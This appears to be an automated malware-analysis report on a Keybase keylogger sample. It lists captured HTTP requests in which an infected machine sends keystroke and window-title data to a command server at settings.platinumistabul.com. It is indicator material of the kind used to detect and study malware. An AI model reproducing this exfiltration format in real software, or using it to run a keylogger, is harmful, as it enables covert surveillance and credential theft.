GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04 HTTP/1.1 Host: settings.platinumistabul.com
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
Detected family: #Keybase
TheSystem Itself @ 2018-02-22 00:28:02
#infosec #automation
TheSystem Itself @ 2018-02-22 00:03:20